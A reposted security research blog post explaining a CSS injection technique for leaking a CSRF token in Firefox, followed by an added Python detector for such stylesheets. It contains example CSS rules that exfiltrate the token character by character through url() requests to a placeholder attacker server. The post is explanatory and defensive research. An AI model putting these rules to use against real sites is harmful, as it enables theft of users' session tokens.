
[Repost] CSS data exfiltration in Firefox via a single injection point

2020-2-14 10:51


Original link: https://research.securitum.com/css-data-exfiltration-in-firefox-via-single-injection-point/


A few months ago I identified a security issue in Firefox known as CVE-2019-17016. During analysis of the issue, I’ve come up with a new technique of CSS data exfiltration in Firefox via a single injection point which I’m going to share in this blog post.

Basics and prior art

For the sake of the examples, we assume that we want to leak a CSRF token from an <input> element.

<input type="hidden" name="csrftoken" value="SOME_VALUE">

We cannot use scripts (perhaps because of CSP), so we need to settle for style injection. The classic way is to use attribute selectors, for instance:

input[name='csrftoken'][value^='a'] {
  background: url(//ATTACKER-SERVER/leak/a);
}

input[name='csrftoken'][value^='b'] {
  background: url(//ATTACKER-SERVER/leak/b);
}

input[name='csrftoken'][value^='z'] {
  background: url(//ATTACKER-SERVER/leak/z);
}

If the CSS rule is applied, then the attacker gets an HTTP request, leaking the first character of the token. Then, another stylesheet needs to be prepared that includes the first known character, for instance:

input[name='csrftoken'][value^='aa'] {
  background: url(//ATTACKER-SERVER/leak/aa);
}

input[name='csrftoken'][value^='ab'] {
  background: url(//ATTACKER-SERVER/leak/ab);
}

input[name='csrftoken'][value^='az'] {
  background: url(//ATTACKER-SERVER/leak/az);
}

It was usually assumed that each subsequent stylesheet had to be delivered by reloading the page inside an <iframe>.
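As an added defensive example (not code from the original post): a small Python scanner that flags stylesheets carrying the pattern above, i.e. rules that pair a partial-match attribute selector (`^=`, `$=`, `*=`) with a `url()` fetched from a host outside an allowlist. The sample stylesheet is constructed from the rules shown; `ATTACKER-SERVER` is the post's placeholder hostname and `cdn.example` is an assumed allowlisted host.

```python
import re
from urllib.parse import urlsplit

# Constructed sample (hypothetical input): the attribute-selector stylesheet from the
# post, plus one benign same-origin rule. ATTACKER-SERVER is the post's placeholder.
SAMPLE_CSS = """
input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a); }
input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); }
input[name='csrftoken'][value^='z'] { background: url(//ATTACKER-SERVER/leak/z); }
.logo { background: url(/static/logo.png); }
"""

RULE_RE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)  # selector { declarations }
ATTR_RE = re.compile(r"""\[\s*([\w-]+)\s*([~|^$*]?=)\s*(["']?)([^\]]*?)\3\s*\]""")
URL_RE = re.compile(r"""url\(\s*(["']?)([^)]*?)\1\s*\)""", re.I)
PARTIAL_OPS = {"^=", "$=", "*="}  # prefix / suffix / substring tests against a value

def find_exfil_rules(css, allowed_hosts=()):
    """Return (attribute, operator, probed_fragment, host) for every rule that combines
    a partial-match attribute selector with a url() loaded from a non-allowlisted host.
    A url() without a host (same-origin path) is never reported."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for selector, body in RULE_RE.findall(css):
        probes = [(name, op, val) for name, op, _, val in ATTR_RE.findall(selector)
                  if op in PARTIAL_OPS]
        if not probes:
            continue
        for _, target in URL_RE.findall(body):
            host = urlsplit(target.strip()).netloc.lower()
            if host and host not in allowed:
                findings.extend((name, op, val, host) for name, op, val in probes)
    return findings

def probed_fragments(findings, attribute="value"):
    """Which fragments of the given attribute the stylesheet is testing for."""
    return sorted({val for name, _, val, _ in findings if name == attribute})

if __name__ == "__main__":
    hits = find_exfil_rules(SAMPLE_CSS, allowed_hosts=["cdn.example"])
    for name, op, val, host in hits:
        print(f"probe {name}{op}{val!r} leaks to {host}")
    print("fragments probed:", probed_fragments(hits))
```

The check is heuristic: it catches the selector-plus-external-fetch shape, not every way a stylesheet can trigger a request, so it complements rather than replaces a CSP that restricts `style-src` and `img-src`.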


In 2018 Pepe Vila had an amazing concept that we can achieve the same in Chrome with a single injection point by abusing CSS recursive imports. The same trick was rediscovered in 2019 by Nathanial Lattimer (aka @d0nutptr), however with a slight variation. I’ll summarize Lattimer’s approach below because it is closer to what I’ve come up with in Firefox, even though (what’s pretty funny) I wasn’t aware of Lattimer’s research when doing my own. So one can say that I rediscovered a rediscovery…


Latest replies (1)
mb_xghoecki 2020-2-14 12:46
Thanks for sharing